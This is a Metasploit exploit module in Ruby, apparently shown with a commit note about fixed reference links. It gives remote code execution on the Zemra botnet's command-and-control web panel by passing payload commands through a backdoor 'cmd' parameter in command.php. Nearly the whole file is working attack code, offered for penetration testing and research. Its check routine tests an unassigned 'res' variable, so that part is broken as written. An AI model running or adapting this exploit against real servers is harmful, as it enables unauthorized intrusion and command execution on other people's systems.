SubcomandanteMeowcos
a54f3d4707
doing these "by domain" now, piecemeal. this PR fixes all broken references to the "insecurety" website, which is long dead.
87 lines
2.6 KiB
Ruby
87 lines
2.6 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution',
|
|
'Description' => %q{
|
|
This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
|
|
inside its leaked source code. Zemra is a crimeware bot that can be used to
|
|
conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Jay Turla <@shipcod3>', #Metasploit Module
|
|
'Angel Injection', #Initial Discovery (PoC from Inj3ct0r Team)
|
|
'Darren Martyn <@info_dox>' #Initial Discovery
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'http://0day.today/exploit/19259'],
|
|
['URL', 'https://web.archive.org/web/20140207114942/http://insecurety.net/?p=144'], #leaked source code and backdoor intro
|
|
['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot']
|
|
],
|
|
'Privileged' => false,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 10000,
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd'
|
|
}
|
|
},
|
|
'Platform' => %w{ unix win },
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' =>
|
|
[
|
|
['zemra panel / Unix', { 'Platform' => 'unix' } ],
|
|
['zemra panel / Windows', { 'Platform' => 'win' } ]
|
|
],
|
|
'DisclosureDate' => '2012-06-28',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
|
|
])
|
|
end
|
|
|
|
def check
|
|
txt = Rex::Text.rand_text_alpha(8)
|
|
http_send_command(txt)
|
|
if res && res.body =~ /cmd/
|
|
return Exploit::CheckCode::Vulnerable
|
|
end
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
def http_send_command(cmd)
|
|
uri = normalize_uri(target_uri.path.to_s)
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => uri,
|
|
'vars_get' =>
|
|
{
|
|
'cmd' => cmd
|
|
}
|
|
})
|
|
unless res && res.code == 200
|
|
fail_with(Failure::Unknown, 'Failed to execute the command.')
|
|
end
|
|
res
|
|
end
|
|
|
|
def exploit
|
|
http_send_command(payload.encoded)
|
|
end
|
|
end
|